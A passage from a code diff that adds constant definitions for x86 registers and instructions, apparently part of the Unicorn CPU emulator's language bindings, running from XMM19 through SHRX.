= 140; + UC_X86_REG_XMM19 = 141; + UC_X86_REG_XMM20 = 142; + UC_X86_REG_XMM21 = 143; + UC_X86_REG_XMM22 = 144; + UC_X86_REG_XMM23 = 145; + UC_X86_REG_XMM24 = 146; + UC_X86_REG_XMM25 = 147; + UC_X86_REG_XMM26 = 148; + UC_X86_REG_XMM27 = 149; + UC_X86_REG_XMM28 = 150; + UC_X86_REG_XMM29 = 151; + UC_X86_REG_XMM30 = 152; + UC_X86_REG_XMM31 = 153; + UC_X86_REG_YMM0 = 154; + UC_X86_REG_YMM1 = 155; + UC_X86_REG_YMM2 = 156; + UC_X86_REG_YMM3 = 157; + UC_X86_REG_YMM4 = 158; + UC_X86_REG_YMM5 = 159; + UC_X86_REG_YMM6 = 160; + UC_X86_REG_YMM7 = 161; + UC_X86_REG_YMM8 = 162; + UC_X86_REG_YMM9 = 163; + UC_X86_REG_YMM10 = 
164; + UC_X86_REG_YMM11 = 165; + UC_X86_REG_YMM12 = 166; + UC_X86_REG_YMM13 = 167; + UC_X86_REG_YMM14 = 168; + UC_X86_REG_YMM15 = 169; + UC_X86_REG_YMM16 = 170; + UC_X86_REG_YMM17 = 171; + UC_X86_REG_YMM18 = 172; + UC_X86_REG_YMM19 = 173; + UC_X86_REG_YMM20 = 174; + UC_X86_REG_YMM21 = 175; + UC_X86_REG_YMM22 = 176; + UC_X86_REG_YMM23 = 177; + UC_X86_REG_YMM24 = 178; + UC_X86_REG_YMM25 = 179; + UC_X86_REG_YMM26 = 180; + UC_X86_REG_YMM27 = 181; + UC_X86_REG_YMM28 = 182; + UC_X86_REG_YMM29 = 183; + UC_X86_REG_YMM30 = 184; + UC_X86_REG_YMM31 = 185; + UC_X86_REG_ZMM0 = 186; + UC_X86_REG_ZMM1 = 187; + UC_X86_REG_ZMM2 = 188; + UC_X86_REG_ZMM3 = 189; + UC_X86_REG_ZMM4 = 190; + UC_X86_REG_ZMM5 = 191; + UC_X86_REG_ZMM6 = 192; + UC_X86_REG_ZMM7 = 193; + UC_X86_REG_ZMM8 = 194; + UC_X86_REG_ZMM9 = 195; + UC_X86_REG_ZMM10 = 196; + UC_X86_REG_ZMM11 = 197; + UC_X86_REG_ZMM12 = 198; + UC_X86_REG_ZMM13 = 199; + UC_X86_REG_ZMM14 = 200; + UC_X86_REG_ZMM15 = 201; + UC_X86_REG_ZMM16 = 202; + UC_X86_REG_ZMM17 = 203; + UC_X86_REG_ZMM18 = 204; + UC_X86_REG_ZMM19 = 205; + UC_X86_REG_ZMM20 = 206; + UC_X86_REG_ZMM21 = 207; + UC_X86_REG_ZMM22 = 208; + UC_X86_REG_ZMM23 = 209; + UC_X86_REG_ZMM24 = 210; + UC_X86_REG_ZMM25 = 211; + UC_X86_REG_ZMM26 = 212; + UC_X86_REG_ZMM27 = 213; + UC_X86_REG_ZMM28 = 214; + UC_X86_REG_ZMM29 = 215; + UC_X86_REG_ZMM30 = 216; + UC_X86_REG_ZMM31 = 217; + UC_X86_REG_R8B = 218; + UC_X86_REG_R9B = 219; + UC_X86_REG_R10B = 220; + UC_X86_REG_R11B = 221; + UC_X86_REG_R12B = 222; + UC_X86_REG_R13B = 223; + UC_X86_REG_R14B = 224; + UC_X86_REG_R15B = 225; + UC_X86_REG_R8D = 226; + UC_X86_REG_R9D = 227; + UC_X86_REG_R10D = 228; + UC_X86_REG_R11D = 229; + UC_X86_REG_R12D = 230; + UC_X86_REG_R13D = 231; + UC_X86_REG_R14D = 232; + UC_X86_REG_R15D = 233; + UC_X86_REG_R8W = 234; + UC_X86_REG_R9W = 235; + UC_X86_REG_R10W = 236; + UC_X86_REG_R11W = 237; + UC_X86_REG_R12W = 238; + UC_X86_REG_R13W = 239; + UC_X86_REG_R14W = 240; + UC_X86_REG_R15W = 241; + UC_X86_REG_IDTR = 242; + 
UC_X86_REG_GDTR = 243; + UC_X86_REG_LDTR = 244; + UC_X86_REG_TR = 245; + UC_X86_REG_FPCW = 246; + UC_X86_REG_FPTAG = 247; + UC_X86_REG_MSR = 248; + UC_X86_REG_MXCSR = 249; + UC_X86_REG_FS_BASE = 250; + UC_X86_REG_GS_BASE = 251; + UC_X86_REG_ENDING = 252; + +// X86 instructions + + UC_X86_INS_INVALID = 0; + UC_X86_INS_AAA = 1; + UC_X86_INS_AAD = 2; + UC_X86_INS_AAM = 3; + UC_X86_INS_AAS = 4; + UC_X86_INS_FABS = 5; + UC_X86_INS_ADC = 6; + UC_X86_INS_ADCX = 7; + UC_X86_INS_ADD = 8; + UC_X86_INS_ADDPD = 9; + UC_X86_INS_ADDPS = 10; + UC_X86_INS_ADDSD = 11; + UC_X86_INS_ADDSS = 12; + UC_X86_INS_ADDSUBPD = 13; + UC_X86_INS_ADDSUBPS = 14; + UC_X86_INS_FADD = 15; + UC_X86_INS_FIADD = 16; + UC_X86_INS_FADDP = 17; + UC_X86_INS_ADOX = 18; + UC_X86_INS_AESDECLAST = 19; + UC_X86_INS_AESDEC = 20; + UC_X86_INS_AESENCLAST = 21; + UC_X86_INS_AESENC = 22; + UC_X86_INS_AESIMC = 23; + UC_X86_INS_AESKEYGENASSIST = 24; + UC_X86_INS_AND = 25; + UC_X86_INS_ANDN = 26; + UC_X86_INS_ANDNPD = 27; + UC_X86_INS_ANDNPS = 28; + UC_X86_INS_ANDPD = 29; + UC_X86_INS_ANDPS = 30; + UC_X86_INS_ARPL = 31; + UC_X86_INS_BEXTR = 32; + UC_X86_INS_BLCFILL = 33; + UC_X86_INS_BLCI = 34; + UC_X86_INS_BLCIC = 35; + UC_X86_INS_BLCMSK = 36; + UC_X86_INS_BLCS = 37; + UC_X86_INS_BLENDPD = 38; + UC_X86_INS_BLENDPS = 39; + UC_X86_INS_BLENDVPD = 40; + UC_X86_INS_BLENDVPS = 41; + UC_X86_INS_BLSFILL = 42; + UC_X86_INS_BLSI = 43; + UC_X86_INS_BLSIC = 44; + UC_X86_INS_BLSMSK = 45; + UC_X86_INS_BLSR = 46; + UC_X86_INS_BOUND = 47; + UC_X86_INS_BSF = 48; + UC_X86_INS_BSR = 49; + UC_X86_INS_BSWAP = 50; + UC_X86_INS_BT = 51; + UC_X86_INS_BTC = 52; + UC_X86_INS_BTR = 53; + UC_X86_INS_BTS = 54; + UC_X86_INS_BZHI = 55; + UC_X86_INS_CALL = 56; + UC_X86_INS_CBW = 57; + UC_X86_INS_CDQ = 58; + UC_X86_INS_CDQE = 59; + UC_X86_INS_FCHS = 60; + UC_X86_INS_CLAC = 61; + UC_X86_INS_CLC = 62; + UC_X86_INS_CLD = 63; + UC_X86_INS_CLFLUSH = 64; + UC_X86_INS_CLFLUSHOPT = 65; + UC_X86_INS_CLGI = 66; + UC_X86_INS_CLI = 67; + UC_X86_INS_CLTS = 68; + 
UC_X86_INS_CLWB = 69; + UC_X86_INS_CMC = 70; + UC_X86_INS_CMOVA = 71; + UC_X86_INS_CMOVAE = 72; + UC_X86_INS_CMOVB = 73; + UC_X86_INS_CMOVBE = 74; + UC_X86_INS_FCMOVBE = 75; + UC_X86_INS_FCMOVB = 76; + UC_X86_INS_CMOVE = 77; + UC_X86_INS_FCMOVE = 78; + UC_X86_INS_CMOVG = 79; + UC_X86_INS_CMOVGE = 80; + UC_X86_INS_CMOVL = 81; + UC_X86_INS_CMOVLE = 82; + UC_X86_INS_FCMOVNBE = 83; + UC_X86_INS_FCMOVNB = 84; + UC_X86_INS_CMOVNE = 85; + UC_X86_INS_FCMOVNE = 86; + UC_X86_INS_CMOVNO = 87; + UC_X86_INS_CMOVNP = 88; + UC_X86_INS_FCMOVNU = 89; + UC_X86_INS_CMOVNS = 90; + UC_X86_INS_CMOVO = 91; + UC_X86_INS_CMOVP = 92; + UC_X86_INS_FCMOVU = 93; + UC_X86_INS_CMOVS = 94; + UC_X86_INS_CMP = 95; + UC_X86_INS_CMPPD = 96; + UC_X86_INS_CMPPS = 97; + UC_X86_INS_CMPSB = 98; + UC_X86_INS_CMPSD = 99; + UC_X86_INS_CMPSQ = 100; + UC_X86_INS_CMPSS = 101; + UC_X86_INS_CMPSW = 102; + UC_X86_INS_CMPXCHG16B = 103; + UC_X86_INS_CMPXCHG = 104; + UC_X86_INS_CMPXCHG8B = 105; + UC_X86_INS_COMISD = 106; + UC_X86_INS_COMISS = 107; + UC_X86_INS_FCOMP = 108; + UC_X86_INS_FCOMPI = 109; + UC_X86_INS_FCOMI = 110; + UC_X86_INS_FCOM = 111; + UC_X86_INS_FCOS = 112; + UC_X86_INS_CPUID = 113; + UC_X86_INS_CQO = 114; + UC_X86_INS_CRC32 = 115; + UC_X86_INS_CVTDQ2PD = 116; + UC_X86_INS_CVTDQ2PS = 117; + UC_X86_INS_CVTPD2DQ = 118; + UC_X86_INS_CVTPD2PS = 119; + UC_X86_INS_CVTPS2DQ = 120; + UC_X86_INS_CVTPS2PD = 121; + UC_X86_INS_CVTSD2SI = 122; + UC_X86_INS_CVTSD2SS = 123; + UC_X86_INS_CVTSI2SD = 124; + UC_X86_INS_CVTSI2SS = 125; + UC_X86_INS_CVTSS2SD = 126; + UC_X86_INS_CVTSS2SI = 127; + UC_X86_INS_CVTTPD2DQ = 128; + UC_X86_INS_CVTTPS2DQ = 129; + UC_X86_INS_CVTTSD2SI = 130; + UC_X86_INS_CVTTSS2SI = 131; + UC_X86_INS_CWD = 132; + UC_X86_INS_CWDE = 133; + UC_X86_INS_DAA = 134; + UC_X86_INS_DAS = 135; + UC_X86_INS_DATA16 = 136; + UC_X86_INS_DEC = 137; + UC_X86_INS_DIV = 138; + UC_X86_INS_DIVPD = 139; + UC_X86_INS_DIVPS = 140; + UC_X86_INS_FDIVR = 141; + UC_X86_INS_FIDIVR = 142; + UC_X86_INS_FDIVRP = 143; + 
UC_X86_INS_DIVSD = 144; + UC_X86_INS_DIVSS = 145; + UC_X86_INS_FDIV = 146; + UC_X86_INS_FIDIV = 147; + UC_X86_INS_FDIVP = 148; + UC_X86_INS_DPPD = 149; + UC_X86_INS_DPPS = 150; + UC_X86_INS_RET = 151; + UC_X86_INS_ENCLS = 152; + UC_X86_INS_ENCLU = 153; + UC_X86_INS_ENTER = 154; + UC_X86_INS_EXTRACTPS = 155; + UC_X86_INS_EXTRQ = 156; + UC_X86_INS_F2XM1 = 157; + UC_X86_INS_LCALL = 158; + UC_X86_INS_LJMP = 159; + UC_X86_INS_FBLD = 160; + UC_X86_INS_FBSTP = 161; + UC_X86_INS_FCOMPP = 162; + UC_X86_INS_FDECSTP = 163; + UC_X86_INS_FEMMS = 164; + UC_X86_INS_FFREE = 165; + UC_X86_INS_FICOM = 166; + UC_X86_INS_FICOMP = 167; + UC_X86_INS_FINCSTP = 168; + UC_X86_INS_FLDCW = 169; + UC_X86_INS_FLDENV = 170; + UC_X86_INS_FLDL2E = 171; + UC_X86_INS_FLDL2T = 172; + UC_X86_INS_FLDLG2 = 173; + UC_X86_INS_FLDLN2 = 174; + UC_X86_INS_FLDPI = 175; + UC_X86_INS_FNCLEX = 176; + UC_X86_INS_FNINIT = 177; + UC_X86_INS_FNOP = 178; + UC_X86_INS_FNSTCW = 179; + UC_X86_INS_FNSTSW = 180; + UC_X86_INS_FPATAN = 181; + UC_X86_INS_FPREM = 182; + UC_X86_INS_FPREM1 = 183; + UC_X86_INS_FPTAN = 184; + UC_X86_INS_FFREEP = 185; + UC_X86_INS_FRNDINT = 186; + UC_X86_INS_FRSTOR = 187; + UC_X86_INS_FNSAVE = 188; + UC_X86_INS_FSCALE = 189; + UC_X86_INS_FSETPM = 190; + UC_X86_INS_FSINCOS = 191; + UC_X86_INS_FNSTENV = 192; + UC_X86_INS_FXAM = 193; + UC_X86_INS_FXRSTOR = 194; + UC_X86_INS_FXRSTOR64 = 195; + UC_X86_INS_FXSAVE = 196; + UC_X86_INS_FXSAVE64 = 197; + UC_X86_INS_FXTRACT = 198; + UC_X86_INS_FYL2X = 199; + UC_X86_INS_FYL2XP1 = 200; + UC_X86_INS_MOVAPD = 201; + UC_X86_INS_MOVAPS = 202; + UC_X86_INS_ORPD = 203; + UC_X86_INS_ORPS = 204; + UC_X86_INS_VMOVAPD = 205; + UC_X86_INS_VMOVAPS = 206; + UC_X86_INS_XORPD = 207; + UC_X86_INS_XORPS = 208; + UC_X86_INS_GETSEC = 209; + UC_X86_INS_HADDPD = 210; + UC_X86_INS_HADDPS = 211; + UC_X86_INS_HLT = 212; + UC_X86_INS_HSUBPD = 213; + UC_X86_INS_HSUBPS = 214; + UC_X86_INS_IDIV = 215; + UC_X86_INS_FILD = 216; + UC_X86_INS_IMUL = 217; + UC_X86_INS_IN = 218; + 
UC_X86_INS_INC = 219; + UC_X86_INS_INSB = 220; + UC_X86_INS_INSERTPS = 221; + UC_X86_INS_INSERTQ = 222; + UC_X86_INS_INSD = 223; + UC_X86_INS_INSW = 224; + UC_X86_INS_INT = 225; + UC_X86_INS_INT1 = 226; + UC_X86_INS_INT3 = 227; + UC_X86_INS_INTO = 228; + UC_X86_INS_INVD = 229; + UC_X86_INS_INVEPT = 230; + UC_X86_INS_INVLPG = 231; + UC_X86_INS_INVLPGA = 232; + UC_X86_INS_INVPCID = 233; + UC_X86_INS_INVVPID = 234; + UC_X86_INS_IRET = 235; + UC_X86_INS_IRETD = 236; + UC_X86_INS_IRETQ = 237; + UC_X86_INS_FISTTP = 238; + UC_X86_INS_FIST = 239; + UC_X86_INS_FISTP = 240; + UC_X86_INS_UCOMISD = 241; + UC_X86_INS_UCOMISS = 242; + UC_X86_INS_VCOMISD = 243; + UC_X86_INS_VCOMISS = 244; + UC_X86_INS_VCVTSD2SS = 245; + UC_X86_INS_VCVTSI2SD = 246; + UC_X86_INS_VCVTSI2SS = 247; + UC_X86_INS_VCVTSS2SD = 248; + UC_X86_INS_VCVTTSD2SI = 249; + UC_X86_INS_VCVTTSD2USI = 250; + UC_X86_INS_VCVTTSS2SI = 251; + UC_X86_INS_VCVTTSS2USI = 252; + UC_X86_INS_VCVTUSI2SD = 253; + UC_X86_INS_VCVTUSI2SS = 254; + UC_X86_INS_VUCOMISD = 255; + UC_X86_INS_VUCOMISS = 256; + UC_X86_INS_JAE = 257; + UC_X86_INS_JA = 258; + UC_X86_INS_JBE = 259; + UC_X86_INS_JB = 260; + UC_X86_INS_JCXZ = 261; + UC_X86_INS_JECXZ = 262; + UC_X86_INS_JE = 263; + UC_X86_INS_JGE = 264; + UC_X86_INS_JG = 265; + UC_X86_INS_JLE = 266; + UC_X86_INS_JL = 267; + UC_X86_INS_JMP = 268; + UC_X86_INS_JNE = 269; + UC_X86_INS_JNO = 270; + UC_X86_INS_JNP = 271; + UC_X86_INS_JNS = 272; + UC_X86_INS_JO = 273; + UC_X86_INS_JP = 274; + UC_X86_INS_JRCXZ = 275; + UC_X86_INS_JS = 276; + UC_X86_INS_KANDB = 277; + UC_X86_INS_KANDD = 278; + UC_X86_INS_KANDNB = 279; + UC_X86_INS_KANDND = 280; + UC_X86_INS_KANDNQ = 281; + UC_X86_INS_KANDNW = 282; + UC_X86_INS_KANDQ = 283; + UC_X86_INS_KANDW = 284; + UC_X86_INS_KMOVB = 285; + UC_X86_INS_KMOVD = 286; + UC_X86_INS_KMOVQ = 287; + UC_X86_INS_KMOVW = 288; + UC_X86_INS_KNOTB = 289; + UC_X86_INS_KNOTD = 290; + UC_X86_INS_KNOTQ = 291; + UC_X86_INS_KNOTW = 292; + UC_X86_INS_KORB = 293; + UC_X86_INS_KORD = 294; + 
UC_X86_INS_KORQ = 295; + UC_X86_INS_KORTESTB = 296; + UC_X86_INS_KORTESTD = 297; + UC_X86_INS_KORTESTQ = 298; + UC_X86_INS_KORTESTW = 299; + UC_X86_INS_KORW = 300; + UC_X86_INS_KSHIFTLB = 301; + UC_X86_INS_KSHIFTLD = 302; + UC_X86_INS_KSHIFTLQ = 303; + UC_X86_INS_KSHIFTLW = 304; + UC_X86_INS_KSHIFTRB = 305; + UC_X86_INS_KSHIFTRD = 306; + UC_X86_INS_KSHIFTRQ = 307; + UC_X86_INS_KSHIFTRW = 308; + UC_X86_INS_KUNPCKBW = 309; + UC_X86_INS_KXNORB = 310; + UC_X86_INS_KXNORD = 311; + UC_X86_INS_KXNORQ = 312; + UC_X86_INS_KXNORW = 313; + UC_X86_INS_KXORB = 314; + UC_X86_INS_KXORD = 315; + UC_X86_INS_KXORQ = 316; + UC_X86_INS_KXORW = 317; + UC_X86_INS_LAHF = 318; + UC_X86_INS_LAR = 319; + UC_X86_INS_LDDQU = 320; + UC_X86_INS_LDMXCSR = 321; + UC_X86_INS_LDS = 322; + UC_X86_INS_FLDZ = 323; + UC_X86_INS_FLD1 = 324; + UC_X86_INS_FLD = 325; + UC_X86_INS_LEA = 326; + UC_X86_INS_LEAVE = 327; + UC_X86_INS_LES = 328; + UC_X86_INS_LFENCE = 329; + UC_X86_INS_LFS = 330; + UC_X86_INS_LGDT = 331; + UC_X86_INS_LGS = 332; + UC_X86_INS_LIDT = 333; + UC_X86_INS_LLDT = 334; + UC_X86_INS_LMSW = 335; + UC_X86_INS_OR = 336; + UC_X86_INS_SUB = 337; + UC_X86_INS_XOR = 338; + UC_X86_INS_LODSB = 339; + UC_X86_INS_LODSD = 340; + UC_X86_INS_LODSQ = 341; + UC_X86_INS_LODSW = 342; + UC_X86_INS_LOOP = 343; + UC_X86_INS_LOOPE = 344; + UC_X86_INS_LOOPNE = 345; + UC_X86_INS_RETF = 346; + UC_X86_INS_RETFQ = 347; + UC_X86_INS_LSL = 348; + UC_X86_INS_LSS = 349; + UC_X86_INS_LTR = 350; + UC_X86_INS_XADD = 351; + UC_X86_INS_LZCNT = 352; + UC_X86_INS_MASKMOVDQU = 353; + UC_X86_INS_MAXPD = 354; + UC_X86_INS_MAXPS = 355; + UC_X86_INS_MAXSD = 356; + UC_X86_INS_MAXSS = 357; + UC_X86_INS_MFENCE = 358; + UC_X86_INS_MINPD = 359; + UC_X86_INS_MINPS = 360; + UC_X86_INS_MINSD = 361; + UC_X86_INS_MINSS = 362; + UC_X86_INS_CVTPD2PI = 363; + UC_X86_INS_CVTPI2PD = 364; + UC_X86_INS_CVTPI2PS = 365; + UC_X86_INS_CVTPS2PI = 366; + UC_X86_INS_CVTTPD2PI = 367; + UC_X86_INS_CVTTPS2PI = 368; + UC_X86_INS_EMMS = 369; + 
UC_X86_INS_MASKMOVQ = 370; + UC_X86_INS_MOVD = 371; + UC_X86_INS_MOVDQ2Q = 372; + UC_X86_INS_MOVNTQ = 373; + UC_X86_INS_MOVQ2DQ = 374; + UC_X86_INS_MOVQ = 375; + UC_X86_INS_PABSB = 376; + UC_X86_INS_PABSD = 377; + UC_X86_INS_PABSW = 378; + UC_X86_INS_PACKSSDW = 379; + UC_X86_INS_PACKSSWB = 380; + UC_X86_INS_PACKUSWB = 381; + UC_X86_INS_PADDB = 382; + UC_X86_INS_PADDD = 383; + UC_X86_INS_PADDQ = 384; + UC_X86_INS_PADDSB = 385; + UC_X86_INS_PADDSW = 386; + UC_X86_INS_PADDUSB = 387; + UC_X86_INS_PADDUSW = 388; + UC_X86_INS_PADDW = 389; + UC_X86_INS_PALIGNR = 390; + UC_X86_INS_PANDN = 391; + UC_X86_INS_PAND = 392; + UC_X86_INS_PAVGB = 393; + UC_X86_INS_PAVGW = 394; + UC_X86_INS_PCMPEQB = 395; + UC_X86_INS_PCMPEQD = 396; + UC_X86_INS_PCMPEQW = 397; + UC_X86_INS_PCMPGTB = 398; + UC_X86_INS_PCMPGTD = 399; + UC_X86_INS_PCMPGTW = 400; + UC_X86_INS_PEXTRW = 401; + UC_X86_INS_PHADDSW = 402; + UC_X86_INS_PHADDW = 403; + UC_X86_INS_PHADDD = 404; + UC_X86_INS_PHSUBD = 405; + UC_X86_INS_PHSUBSW = 406; + UC_X86_INS_PHSUBW = 407; + UC_X86_INS_PINSRW = 408; + UC_X86_INS_PMADDUBSW = 409; + UC_X86_INS_PMADDWD = 410; + UC_X86_INS_PMAXSW = 411; + UC_X86_INS_PMAXUB = 412; + UC_X86_INS_PMINSW = 413; + UC_X86_INS_PMINUB = 414; + UC_X86_INS_PMOVMSKB = 415; + UC_X86_INS_PMULHRSW = 416; + UC_X86_INS_PMULHUW = 417; + UC_X86_INS_PMULHW = 418; + UC_X86_INS_PMULLW = 419; + UC_X86_INS_PMULUDQ = 420; + UC_X86_INS_POR = 421; + UC_X86_INS_PSADBW = 422; + UC_X86_INS_PSHUFB = 423; + UC_X86_INS_PSHUFW = 424; + UC_X86_INS_PSIGNB = 425; + UC_X86_INS_PSIGND = 426; + UC_X86_INS_PSIGNW = 427; + UC_X86_INS_PSLLD = 428; + UC_X86_INS_PSLLQ = 429; + UC_X86_INS_PSLLW = 430; + UC_X86_INS_PSRAD = 431; + UC_X86_INS_PSRAW = 432; + UC_X86_INS_PSRLD = 433; + UC_X86_INS_PSRLQ = 434; + UC_X86_INS_PSRLW = 435; + UC_X86_INS_PSUBB = 436; + UC_X86_INS_PSUBD = 437; + UC_X86_INS_PSUBQ = 438; + UC_X86_INS_PSUBSB = 439; + UC_X86_INS_PSUBSW = 440; + UC_X86_INS_PSUBUSB = 441; + UC_X86_INS_PSUBUSW = 442; + UC_X86_INS_PSUBW = 443; + 
UC_X86_INS_PUNPCKHBW = 444; + UC_X86_INS_PUNPCKHDQ = 445; + UC_X86_INS_PUNPCKHWD = 446; + UC_X86_INS_PUNPCKLBW = 447; + UC_X86_INS_PUNPCKLDQ = 448; + UC_X86_INS_PUNPCKLWD = 449; + UC_X86_INS_PXOR = 450; + UC_X86_INS_MONITOR = 451; + UC_X86_INS_MONTMUL = 452; + UC_X86_INS_MOV = 453; + UC_X86_INS_MOVABS = 454; + UC_X86_INS_MOVBE = 455; + UC_X86_INS_MOVDDUP = 456; + UC_X86_INS_MOVDQA = 457; + UC_X86_INS_MOVDQU = 458; + UC_X86_INS_MOVHLPS = 459; + UC_X86_INS_MOVHPD = 460; + UC_X86_INS_MOVHPS = 461; + UC_X86_INS_MOVLHPS = 462; + UC_X86_INS_MOVLPD = 463; + UC_X86_INS_MOVLPS = 464; + UC_X86_INS_MOVMSKPD = 465; + UC_X86_INS_MOVMSKPS = 466; + UC_X86_INS_MOVNTDQA = 467; + UC_X86_INS_MOVNTDQ = 468; + UC_X86_INS_MOVNTI = 469; + UC_X86_INS_MOVNTPD = 470; + UC_X86_INS_MOVNTPS = 471; + UC_X86_INS_MOVNTSD = 472; + UC_X86_INS_MOVNTSS = 473; + UC_X86_INS_MOVSB = 474; + UC_X86_INS_MOVSD = 475; + UC_X86_INS_MOVSHDUP = 476; + UC_X86_INS_MOVSLDUP = 477; + UC_X86_INS_MOVSQ = 478; + UC_X86_INS_MOVSS = 479; + UC_X86_INS_MOVSW = 480; + UC_X86_INS_MOVSX = 481; + UC_X86_INS_MOVSXD = 482; + UC_X86_INS_MOVUPD = 483; + UC_X86_INS_MOVUPS = 484; + UC_X86_INS_MOVZX = 485; + UC_X86_INS_MPSADBW = 486; + UC_X86_INS_MUL = 487; + UC_X86_INS_MULPD = 488; + UC_X86_INS_MULPS = 489; + UC_X86_INS_MULSD = 490; + UC_X86_INS_MULSS = 491; + UC_X86_INS_MULX = 492; + UC_X86_INS_FMUL = 493; + UC_X86_INS_FIMUL = 494; + UC_X86_INS_FMULP = 495; + UC_X86_INS_MWAIT = 496; + UC_X86_INS_NEG = 497; + UC_X86_INS_NOP = 498; + UC_X86_INS_NOT = 499; + UC_X86_INS_OUT = 500; + UC_X86_INS_OUTSB = 501; + UC_X86_INS_OUTSD = 502; + UC_X86_INS_OUTSW = 503; + UC_X86_INS_PACKUSDW = 504; + UC_X86_INS_PAUSE = 505; + UC_X86_INS_PAVGUSB = 506; + UC_X86_INS_PBLENDVB = 507; + UC_X86_INS_PBLENDW = 508; + UC_X86_INS_PCLMULQDQ = 509; + UC_X86_INS_PCMPEQQ = 510; + UC_X86_INS_PCMPESTRI = 511; + UC_X86_INS_PCMPESTRM = 512; + UC_X86_INS_PCMPGTQ = 513; + UC_X86_INS_PCMPISTRI = 514; + UC_X86_INS_PCMPISTRM = 515; + UC_X86_INS_PCOMMIT = 516; + 
UC_X86_INS_PDEP = 517; + UC_X86_INS_PEXT = 518; + UC_X86_INS_PEXTRB = 519; + UC_X86_INS_PEXTRD = 520; + UC_X86_INS_PEXTRQ = 521; + UC_X86_INS_PF2ID = 522; + UC_X86_INS_PF2IW = 523; + UC_X86_INS_PFACC = 524; + UC_X86_INS_PFADD = 525; + UC_X86_INS_PFCMPEQ = 526; + UC_X86_INS_PFCMPGE = 527; + UC_X86_INS_PFCMPGT = 528; + UC_X86_INS_PFMAX = 529; + UC_X86_INS_PFMIN = 530; + UC_X86_INS_PFMUL = 531; + UC_X86_INS_PFNACC = 532; + UC_X86_INS_PFPNACC = 533; + UC_X86_INS_PFRCPIT1 = 534; + UC_X86_INS_PFRCPIT2 = 535; + UC_X86_INS_PFRCP = 536; + UC_X86_INS_PFRSQIT1 = 537; + UC_X86_INS_PFRSQRT = 538; + UC_X86_INS_PFSUBR = 539; + UC_X86_INS_PFSUB = 540; + UC_X86_INS_PHMINPOSUW = 541; + UC_X86_INS_PI2FD = 542; + UC_X86_INS_PI2FW = 543; + UC_X86_INS_PINSRB = 544; + UC_X86_INS_PINSRD = 545; + UC_X86_INS_PINSRQ = 546; + UC_X86_INS_PMAXSB = 547; + UC_X86_INS_PMAXSD = 548; + UC_X86_INS_PMAXUD = 549; + UC_X86_INS_PMAXUW = 550; + UC_X86_INS_PMINSB = 551; + UC_X86_INS_PMINSD = 552; + UC_X86_INS_PMINUD = 553; + UC_X86_INS_PMINUW = 554; + UC_X86_INS_PMOVSXBD = 555; + UC_X86_INS_PMOVSXBQ = 556; + UC_X86_INS_PMOVSXBW = 557; + UC_X86_INS_PMOVSXDQ = 558; + UC_X86_INS_PMOVSXWD = 559; + UC_X86_INS_PMOVSXWQ = 560; + UC_X86_INS_PMOVZXBD = 561; + UC_X86_INS_PMOVZXBQ = 562; + UC_X86_INS_PMOVZXBW = 563; + UC_X86_INS_PMOVZXDQ = 564; + UC_X86_INS_PMOVZXWD = 565; + UC_X86_INS_PMOVZXWQ = 566; + UC_X86_INS_PMULDQ = 567; + UC_X86_INS_PMULHRW = 568; + UC_X86_INS_PMULLD = 569; + UC_X86_INS_POP = 570; + UC_X86_INS_POPAW = 571; + UC_X86_INS_POPAL = 572; + UC_X86_INS_POPCNT = 573; + UC_X86_INS_POPF = 574; + UC_X86_INS_POPFD = 575; + UC_X86_INS_POPFQ = 576; + UC_X86_INS_PREFETCH = 577; + UC_X86_INS_PREFETCHNTA = 578; + UC_X86_INS_PREFETCHT0 = 579; + UC_X86_INS_PREFETCHT1 = 580; + UC_X86_INS_PREFETCHT2 = 581; + UC_X86_INS_PREFETCHW = 582; + UC_X86_INS_PSHUFD = 583; + UC_X86_INS_PSHUFHW = 584; + UC_X86_INS_PSHUFLW = 585; + UC_X86_INS_PSLLDQ = 586; + UC_X86_INS_PSRLDQ = 587; + UC_X86_INS_PSWAPD = 588; + 
UC_X86_INS_PTEST = 589; + UC_X86_INS_PUNPCKHQDQ = 590; + UC_X86_INS_PUNPCKLQDQ = 591; + UC_X86_INS_PUSH = 592; + UC_X86_INS_PUSHAW = 593; + UC_X86_INS_PUSHAL = 594; + UC_X86_INS_PUSHF = 595; + UC_X86_INS_PUSHFD = 596; + UC_X86_INS_PUSHFQ = 597; + UC_X86_INS_RCL = 598; + UC_X86_INS_RCPPS = 599; + UC_X86_INS_RCPSS = 600; + UC_X86_INS_RCR = 601; + UC_X86_INS_RDFSBASE = 602; + UC_X86_INS_RDGSBASE = 603; + UC_X86_INS_RDMSR = 604; + UC_X86_INS_RDPMC = 605; + UC_X86_INS_RDRAND = 606; + UC_X86_INS_RDSEED = 607; + UC_X86_INS_RDTSC = 608; + UC_X86_INS_RDTSCP = 609; + UC_X86_INS_ROL = 610; + UC_X86_INS_ROR = 611; + UC_X86_INS_RORX = 612; + UC_X86_INS_ROUNDPD = 613; + UC_X86_INS_ROUNDPS = 614; + UC_X86_INS_ROUNDSD = 615; + UC_X86_INS_ROUNDSS = 616; + UC_X86_INS_RSM = 617; + UC_X86_INS_RSQRTPS = 618; + UC_X86_INS_RSQRTSS = 619; + UC_X86_INS_SAHF = 620; + UC_X86_INS_SAL = 621; + UC_X86_INS_SALC = 622; + UC_X86_INS_SAR = 623; + UC_X86_INS_SARX = 624; + UC_X86_INS_SBB = 625; + UC_X86_INS_SCASB = 626; + UC_X86_INS_SCASD = 627; + UC_X86_INS_SCASQ = 628; + UC_X86_INS_SCASW = 629; + UC_X86_INS_SETAE = 630; + UC_X86_INS_SETA = 631; + UC_X86_INS_SETBE = 632; + UC_X86_INS_SETB = 633; + UC_X86_INS_SETE = 634; + UC_X86_INS_SETGE = 635; + UC_X86_INS_SETG = 636; + UC_X86_INS_SETLE = 637; + UC_X86_INS_SETL = 638; + UC_X86_INS_SETNE = 639; + UC_X86_INS_SETNO = 640; + UC_X86_INS_SETNP = 641; + UC_X86_INS_SETNS = 642; + UC_X86_INS_SETO = 643; + UC_X86_INS_SETP = 644; + UC_X86_INS_SETS = 645; + UC_X86_INS_SFENCE = 646; + UC_X86_INS_SGDT = 647; + UC_X86_INS_SHA1MSG1 = 648; + UC_X86_INS_SHA1MSG2 = 649; + UC_X86_INS_SHA1NEXTE = 650; + UC_X86_INS_SHA1RNDS4 = 651; + UC_X86_INS_SHA256MSG1 = 652; + UC_X86_INS_SHA256MSG2 = 653; + UC_X86_INS_SHA256RNDS2 = 654; + UC_X86_INS_SHL = 655; + UC_X86_INS_SHLD = 656; + UC_X86_INS_SHLX = 657; + UC_X86_INS_SHR = 658; + UC_X86_INS_SHRD = 659; + UC_X86_INS_SHRX = 660; + 